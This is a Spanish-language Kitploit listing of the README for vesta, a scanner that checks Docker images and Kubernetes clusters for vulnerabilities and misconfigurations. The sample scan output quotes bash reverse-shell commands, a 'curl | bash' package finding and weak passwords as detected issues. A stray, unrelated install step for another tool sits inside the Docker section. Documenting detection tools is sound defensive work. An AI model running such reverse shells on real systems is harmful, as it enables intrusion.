Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
vesta — Un kit de detección de análisis estático de vulnerabilidades, configuración de clústeres Docker y Kubernetes basado en la penetración real de la computación en la nube. | Kitploit
Herramientas/GitHubGitHub/kvesta/vesta
Análisis EstáticoEscáneres de VulnerabilidadesSeguridad de ContenedoresAuditoría de ConfiguraciónSeguridad en la NubeDevSecOps
GitHubkvesta/vesta

vesta

Un kit de detección de análisis estático de vulnerabilidades, configuración de clústeres Docker y Kubernetes basado en la penetración real de la computación en la nube.

Ver Repositorio
20531hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir


Un kit de herramientas de detección de análisis estático de vulnerabilidades y configuración de clústeres Docker y Kubernetes, basado en la penetración real en la nube.

Inglés · 简体中文

Resumen

Vesta es un kit de herramientas de detección de análisis estático de vulnerabilidades y configuración de clústeres Docker y Kubernetes. Inspecciona configuraciones de Kubernetes y Docker, pods del clúster y contenedores con prácticas seguras.

Vesta es un kit de herramientas flexible que puede ejecutarse en máquinas físicas en diferentes tipos de sistemas (Windows, Linux, MacOS).

¿Qué puede verificar Vesta?

Escaneo

  • Soporta entrada de escaneo
    • image
    • container
    • filesystem
    • vm (TODO)
  • Escanea las vulnerabilidades de los principales gestores de paquetes
    • apt/apt-get
    • rpm
    • yum
    • dpkg
  • Escanea paquetes maliciosos y vulnerabilidades de paquetes específicos de lenguajes
    • Java(Jar, War. biblioteca principal: log4j)
    • NodeJs(NPM, YARN)
    • Python(Wheel, Poetry)
    • Golang(Go binary)
    • PHP(Composer, frameworks principales: laravel, thinkphp, wordpress, plugins de wordpress, etc.)
    • Rust(Rust binary)
    • Otros (otros vulnerables que pueden causar un posible escape del contenedor y verificar imágenes sospechosas envenenadas)

Docker


Kubernetes

Compilación

Vesta está compilado con Go 1.18.```bash make build

root@kitploit:~
## Inicio rápido

Ejemplo de escaneo de imagen o contenedor, usa `-f` para ingresar mediante un archivo tar, inicia vesta:```bash
# Container
vesta scan image cve-2019-14234_web:latest
vesta scan image -f example.tar

# Image
vesta scan container <CONTAINER ID>
vesta scan container -f example.tar

# Filesystem
vesta scan fs <path_of_filesystem>

Ouput:```bash 2022/11/29 22:50:00 Searching for image 2022/11/29 22:50:19 Begin upgrading vulnerability database 2022/11/29 22:50:19 Vulnerability Database is already initialized 2022/11/29 22:50:19 Begin to analyze the layer 2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. If | | | | | | | | django.utils.text.Truncator's | | | | | | | | chars() and words() methods | | | | | | | | were passed the html=True | | | | | | | | argument, t ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. | | | | | | | | Due to the behaviour of | | | | | | | | the underlying HTMLParser, | | | | | | | | django.utils.html.strip_tags | | | | | | | | would be extremely ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in | | | | | | | | Django 1.11.x before 1.11.23, | | | | | | | | 2.1.x before 2.1.11, and 2.2.x | | | | | | | | before 2.2.4. Due to an error | | | | | | | | in shallow key transformation, | | | | | | | | key and index lookups for | | | | | | | | django.contrib.postgres.f ... | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in | | | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', | | | | | | | | malicious command "curl | bash" are | | | | | | | | detected. | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+

Docker Histories: +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | ID | NAME | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL | DESCRIPTION | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 1 | Image History | - / - | - | 0.0 | high | Confusion value found | | | | | | | | in ENV: 'command' with | | | | | | | | the plain text 'bash -i | | | | | | | | >&/dev/tcp/127.0.0.1/9999 0>&1 | | | | | | | | '. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 2 | | - / - | - | 0.0 | medium | Docker history has found the | | | | | | | | senstive environment with | | | | | | | | key 'SECRET_KEY' and value: | | | | | | | | 123456. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+

root@kitploit:~
<details>
<summary>Resultado</summary>

![](https://assets.kitploit.com/production/public/readmes/5859/9812488f35975e6dfeb2fb38e3498564a2fd1c8d699ccbff2f409390dcc39afd.gif)

</details>

Ejemplo de escaneo de configuración de Docker, iniciar vesta:```bash
vesta analyze docker

O ejecutar con dokcer```bash make run.docker

root@kitploit:~
5. **Dependencias:** Después de la extracción, instala las dependencias necesarias. El framework intentará instalar las dependencias de Python automáticamente en el primer lanzamiento, pero también puedes instalarlas manualmente:

   ```sh
   cd SocialScanner
   pip install -r requirements.txt

Nota: Si encuentras algún problema de permisos, usa:

root@kitploit:~
pip install --user -r requirements.txt

Para una lista completa de dependencias, consulta requirements.txt.```bash 2022/11/29 23:06:32 Start analysing 2022/11/29 23:06:32 Getting engine version 2022/11/29 23:06:32 Getting docker server version 2022/11/29 23:06:32 Getting kernel version

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering | | | ID: None | | | | the CVE-2022-0492 with | | | | | | | CAP_SYS_ADMIN and v1 | | | | | | | architecture of cgroups | | | | | | | vulnerablility, has a | | | | | | | potential container escape. | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering | | | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, | | | | | | | has a potential container | | | | | | | escape. | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 3 | Name: Image Tag | Privileged | true | critical | There has a potential container| | | ID: None | | | | escape in privileged module. | | | | | | | | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found | | | ID: None | | vesta_history_test:latest | | | in command: ' echo | | | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > | | | | | | | config.ini # buildkit'. | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+

root@kitploit:~
Ejemplo de escaneo de configuración de Kubernetes, iniciar vesta:```bash
vesta analyze k8s

Salida:```bash 2022/11/29 23:15:59 Start analysing 2022/11/29 23:15:59 Getting docker server version 2022/11/29 23:15:59 Getting kernel version

Detected 4 vulnerabilities

Pods: +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION | +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential | | | default | Status: Running | | Privileged | | | | container escape in privileged | | | Node Name: docker-desktop | | | | | module. |

    • root@kitploit:~
                                 +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
      

| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has | | | | env | | | | found weak password: | | | | | | | | 'Password123456'. |

    • root@kitploit:~
                                 +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
      

| | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds | | | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: | | | | | | | | 0.91 out of 1.0), which is a | | | | | | | | suspect command backdoor. | +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential | | | default | Status: Running | | capabilities | | | | container escape in privileged | | | Node Name: docker-desktop | | | | | module. |

    • root@kitploit:~
                                 +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
      

| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account | | | | automountServiceAccountToken | | | | and key permission are | | | | | | | | given, which will cause a | | | | | | | | potential container escape. | | | | | | | | Reference clsuterRolebind: | | | | | | | | vuln-clusterrolebinding | | | | | | | | | roleBinding: vuln-rolebinding |

    • root@kitploit:~
                                 +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
      

| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. | | | | Resource | | | | | | | | | | | | | +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures: +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering | | | | | | | the CVE-2022-0185 with | | | | | | | CAP_SYS_ADMIN vulnerablility, | | | | | | | has a potential container | | | | | | | escape. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak | | | | Namespace: default | | | password: 'Password123'. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak | | | | Namespace: default | | | password: 'Password123'. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key | | | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the | | | | rolename: vuln-clusterrole | | pods, services | | default service account, which | | | | kind: ClusterRole | subject | | | will cause a potential data | | | | kind: Group | subject name: | | | leakage. | | | | system:serviceaccounts:vuln | | | | | | | | namespace: vuln | | | | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key | | | | | rolename: vuln-role | role | create, update | resources: | | resources given to the | | | | kind: Role | subject kind: | pods, services | | default service account, which | | | | ServiceAccount | subject name: | | | will cause a potential data | | | | default | namespace: default | | | leakage. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given | | | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', | | | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. | | | | subject kind: User | subject | | | | | | | name: testUser | namespace: | | | | | | | all | | | | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+

root@kitploit:~
<details>
<summary>Resultado</summary>

![](https://assets.kitploit.com/production/public/readmes/5859/43bab2d9479205be7b35bee4f1a68c37877ae7be3cd2b8eaecfb7d39fc578f55.gif)

</details>


## Información de ayuda```bash
$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
               Tutorial is available at https://github.com/kvesta/vesta

Usage:
  vesta [command]

Available Commands:
  analyze     Kubernetes analyze
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  scan        Container scan
  update      Update vulnerability database
  version     Print version information and quit

Flags:
  -h, --help   help for vesta

Evento

Lista de armas de KCon 2023

  • https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2
Descargar herramienta
SoportadoElemento de verificaciónDescripciónGravedadReferencia
✔PrivilegeAllowedEl módulo privilegiado está permitido.críticoRef
✔CapabilitiesSe están abriendo capacidades peligrosas.críticoRef
✔Volume MountMonta ubicaciones peligrosas.críticoRef
✔Docker no autorizadoEl puerto 2375 está abierto y sin autorización.críticoRef
✔Versión del kernelLa versión del kernel está por debajo de la versión de escape.críticoRef
✔Módulo de redEl módulo de red es host y la versión de containerd es menor a 1.41.crítico/medio
✔Módulo PIDEl módulo PID es host.alto
✔Versión del servidor DockerLa versión del servidor está incluida en las versiones vulnerables.crítico/alto/ medio/bajo
✔Verificación de contraseñas débiles en DockerVerifica contraseñas débiles en bases de datos.alto/medio
✔Historial de DockerLas capas y el entorno de Docker contienen comandos peligrosos.alto/medio
✔Puerta trasera en DockerEl comando de entorno de Docker contiene comandos maliciosos.crítico/alto
✔Docker SwarmDocker swarm tiene configuraciones peligrosas o secretos o contenedores inseguros.medio/bajo
✔Cadena de suministro de DockerLa cadena de suministro de Docker tiene configuraciones vulnerables.crítico/alto/ medioRef
SoportadoElemento de verificaciónDescripciónGravedadReferencia
✔PrivilegeAllowedEl módulo privilegiado está permitido.críticoRef
✔CapabilitiesSe están abriendo capacidades peligrosas.críticoRef
✔PV y PVCPV está montado en una ubicación peligrosa y está activo.crítico/medioRef
✔RBACRBAC tiene configuraciones inseguras en clusterrolebinding o rolebinding.alto/medio/ bajo/advertencia
✔Kubernetes-dashboardVerifica -enable-skip-login y los permisos de la cuenta.crítico/alto/bajoRef
✔Versión del kernelLa versión del kernel está por debajo de la versión de escape.críticoRef
✔Versión del servidor Docker (versión de k8s menor a v1.24)La versión del servidor está incluida en las versiones vulnerables.crítico/alto/ medio/bajo
✔Expiración de certificación de KubernetesLa certificación ha expirado después de 30 días.medio
✔Verificación de ConfigMap y SecretVerifica contraseñas débiles en ConfigMap o Secret.alto/medio/bajoRef
✔Verificación de PodSecurityPolicy (versión de k8s menor a v1.25)PodSecurityPolicy tolera configuraciones peligrosas de pods.alto/medio/bajoRef
✔Montaje automático del token de ServiceAccountMonta el token de servicio predeterminado.crítico/alto/ medio/bajoRef
✔Sin límites de recursosNo se han establecido límites de recursos.bajoRef
✔Job y CronjobNo se ha configurado seccomp ni seLinux en Job o CronJob.bajoRef
✔Admin de EnvoyEl admin de Envoy está abierto y escucha en 0.0.0.0.alto/medioRef
✔Versión de CiliumCilium tiene una versión vulnerable.crítico/alto/ medio/bajoRef
✔Configuraciones de IstioIstio tiene versiones y configuraciones vulnerables.crítico/alto/ medio/bajoRef
✔Kubelet 10250/10255 y Kubectl proxyLos puertos 10255/10250 están abiertos sin autorización o Kubectl proxy está abierto.alto/medio/bajo
✔Configuración de EtcdVerificación de configuración segura de Etcd.alto/medio
✔Configuraciones de SidecarSidecar tiene configuraciones peligrosas.crítico/alto/ medio/bajo
✔Anotación de PodLa anotación del pod tiene configuraciones inseguras.alto/medio/ bajo/advertenciaRef
✔DaemonSetDaemonSet tiene configuraciones inseguras.crítico/alto/ medio/bajo
✔Puerta traseraDetección de puerta trasera.crítico/altoRef
✔Movimiento lateral del adminEl pod especifica un nodo maestro.medio/bajo
https://vuln.com